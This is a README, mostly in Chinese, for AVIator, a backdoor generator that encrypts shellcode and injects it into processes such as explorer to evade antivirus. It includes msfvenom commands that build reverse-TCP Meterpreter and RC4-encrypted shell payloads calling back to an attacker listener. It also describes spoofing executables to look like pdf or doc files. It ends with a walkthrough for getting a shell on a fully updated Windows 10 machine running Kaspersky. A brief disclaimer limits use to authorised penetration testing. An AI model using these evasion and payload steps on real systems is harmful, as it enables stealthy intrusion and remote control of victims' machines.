
Antivirus evasion project
AviAtor 移植到 NETCore 5,并拥有更新后的用户界面
关于://名称
AV: 反病毒
Ator: 是一名剑士、炼金术士、科学家、魔法师、学者和工程师,有时能够凭空制造物品 (https://en.wikipedia.org/wiki/Ator)
关于://目的
AV|Ator 是一个后门生成工具,使用加密和注入技术以绕过反病毒检测。更具体地说:
[https://attack.mitre.org/techniques/T1055/]:
可执行文件注入——将恶意代码直接写入进程(无需磁盘上的文件),然后通过附加代码或创建远程线程来触发执行。注入代码的偏移引入了额外要求,即需要重新映射内存引用。此类方法的变体包括反射式DLL注入(将自映射DLL写入进程)和内存模块(写入进程时映射DLL),它们克服了地址重定位问题。
线程执行劫持——将恶意代码或DLL路径注入到进程的线程中。与Process Hollowing类似,线程必须首先被挂起。
该应用程序有一个包含三个主要输入的表单(见下方截图):

重要提示:shellcode应以C#字节数组的形式提供。
默认值包含执行notepad.exe(32位)的shellcode。此演示旨在指示代码应如何形成(使用msfvenom,可以通过-f csharp开关轻松实现,例如 msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp)。
填写提供的输入并选择输出路径后,将根据所选选项生成一个可执行文件。
简而言之,欺骗一个可执行文件使其看起来具有"无害"扩展名,如'pdf'、'txt'等。 例如,文件"testcod.exe"将被解释为"tesexe.doc"
注意,某些杀毒软件会单独将欺骗行为本身视为恶意软件并发出警报。
我想大家都知道这是干什么的 :)
在运行完全更新的Kaspersky杀毒软件的Windows 10机器上获取shell
使用msfvenom创建payload
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
使用以下设置运行AVIator
目标操作系统架构:x64
注入技术:线程劫持(Shellcode架构:x64,操作系统架构:x64)
目标进程:explorer(保持默认)
在攻击者机器上设置监听器
在受害者机器上运行生成的可执行文件
Windows:
编译项目或从以下文件夹下载已编译的可执行文件:
https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries
Linux:
根据您的Linux发行版安装Mono,下载并运行二进制文件
例如在Kali中:
root@kali# apt install mono-devel
root@kali# mono aviator.exe
感谢Damon Mohammadbagher提供的加密程序
我开发此应用程序是为了应对渗透测试过程中的艰巨挑战,这也是使用此应用程序的唯一正确方式。请确保您拥有在系统上使用它的必要权限,切勿将其用于非法目的。